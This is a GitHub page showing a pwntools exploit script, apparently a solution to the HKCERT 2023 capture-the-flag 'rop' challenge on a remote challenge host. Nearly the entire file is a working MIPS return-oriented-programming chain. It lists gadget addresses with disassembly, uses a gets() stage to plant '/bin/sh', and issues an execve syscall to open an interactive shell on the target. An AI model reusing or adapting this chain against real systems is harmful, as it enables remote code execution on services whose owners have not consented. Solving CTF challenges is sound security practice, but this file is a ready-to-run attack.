-
Notifications
You must be signed in to change notification settings - Fork 2
/
Copy pathexploit.py
executable file
·180 lines (151 loc) · 4.82 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# This exploit template was generated via:
# $ pwn template --host chal.hkcert23.pwnable.hk --port 28151 rop
from pwn import *
# Set up pwntools for the correct architecture
exe = context.binary = ELF(args.EXE or 'rop')
# Many built-in settings can be controlled on the command-line and show up
# in "args". For example, to dump all data sent/received, and disable ASLR
# for all created processes...
# ./exploit.py DEBUG NOASLR
# ./exploit.py GDB HOST=example.com PORT=4141 EXE=/tmp/executable
host = args.HOST or 'chal.hkcert23.pwnable.hk'
port = int(args.PORT or 28151)
def start_local(argv=[], *a, **kw):
'''Execute the target binary locally'''
if args.GDB:
return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
else:
return process([exe.path] + argv, *a, **kw)
def start_remote(argv=[], *a, **kw):
'''Connect to the process on the remote host'''
io = connect(host, port)
if args.GDB:
gdb.attach(io, gdbscript=gdbscript)
return io
def start(argv=[], *a, **kw):
'''Start the exploit against the target.'''
if args.LOCAL:
return start_local(argv, *a, **kw)
else:
return start_remote(argv, *a, **kw)
# Specify your GDB script here for debugging
# GDB will be launched if the exploit is run via e.g.
# ./exploit.py GDB
gdbscript = '''
tbreak main
continue
'''.format(**locals())
#===========================================================
# EXPLOIT GOES HERE
#===========================================================
# Arch: mips-32-big
# RELRO: Partial RELRO
# Stack: Canary found
# NX: NX disabled
# PIE: No PIE (0x400000)
# RWX: Has RWX segments
move_a0_s0 = 0x41f650
'''
41f650: 02002025 move a0,s0
41f654: 8fbf0024 lw ra,36(sp)
41f658: 8fb00020 lw s0,32(sp)
41f65c: 03e00008 jr ra
'''
addiu_sp_sp = 0x400840
'''
400840: 8fbf0064 lw ra,100(sp)
400844: 8fbe0060 lw s8,96(sp)
400848: 27bd0068 addiu sp,sp,104
40084c: 03e00008 jr ra
'''
gets = 0x400824
'''
400824: 8f82806c lw v0,-32660(gp)
400828: 0040c825 move t9,v0
40082c: 0411212c bal 408ce0 <_IO_gets>
400830: 00000000 nop
400834: 8fdc0010 lw gp,16(s8)
400838: 00001025 move v0,zero
40083c: 03c0e825 move sp,s8
400840: 8fbf0064 lw ra,100(sp)
400844: 8fbe0060 lw s8,96(sp)
400848: 27bd0068 addiu sp,sp,104
40084c: 03e00008 jr ra
'''
move_a2_s2 = 0x40a9c4
'''
40a9c4: 8fb90028 lw t9,40(sp)
40a9c8: 02403025 move a2,s2
40a9cc: afa20014 sw v0,20(sp)
40a9d0: 02473821 addu a3,s2,a3
40a9d4: afa40018 sw a0,24(sp)
40a9d8: 24a5002c addiu a1,a1,44
40a9dc: afb6001c sw s6,28(sp)
40a9e0: 02602025 move a0,s3
40a9e4: 8fa2002c lw v0,44(sp)
40a9e8: 0320f809 jalr t9
'''
move_a2_s8_a1_s3 = 0x40368c
'''
40368c: 8fb9002c lw t9,44(sp)
403690: 03c03025 move a2,s8
403694: 02602825 move a1,s3
403698: 0320f809 jalr t9
'''
lw_s6 = 0x43f52c
'''
43f52c: 8fbf0054 lw ra,84(sp)
43f530: 8fb60050 lw s6,80(sp)
43f534: 8fb5004c lw s5,76(sp)
43f538: 8fb40048 lw s4,72(sp)
43f53c: 8fb30044 lw s3,68(sp)
43f540: 8fb20040 lw s2,64(sp)
43f544: 8fb1003c lw s1,60(sp)
43f548: 8fb00038 lw s0,56(sp)
43f54c: 03e00008 jr ra
'''
move_v0_s0 = 0x44f84c
'''
44f84c: 8fbf0134 lw ra,308(sp)
44f850: 02001025 move v0,s0
44f854: 8fb00130 lw s0,304(sp)
44f858: 03e00008 jr ra
'''
syscall = 0x40042c
'''
40042c: 0000000c syscall
'''
SYS_execve = 4011
rw = 0x492400
sp = 0x50
def move_sp(n, x):
global sp
sp += n
return x
payload = b''
payload += flat({
sp - 8 : rw,
sp - 4 : move_a0_s0,
sp + 32 : rw,
sp + 36 : move_sp(40, move_a0_s0),
sp + 36 : move_sp(40, gets),
})
payload += b'\n'
sp = 0
payload += flat({
0: b'/bin/sh\0',
sp + 96 : 0,
sp + 100 : move_sp(104, move_a2_s8_a1_s3),
sp + 44 : move_a0_s0,
sp + 32 : rw,
sp + 36 : move_sp(40, move_a0_s0),
sp + 32 : SYS_execve,
sp + 36 : move_sp(40, move_v0_s0),
sp + 308 : syscall,
})
# open('payload', 'wb').write(payload)
io = start()
io.sendlineafter(b'input : \n', payload)
io.interactive()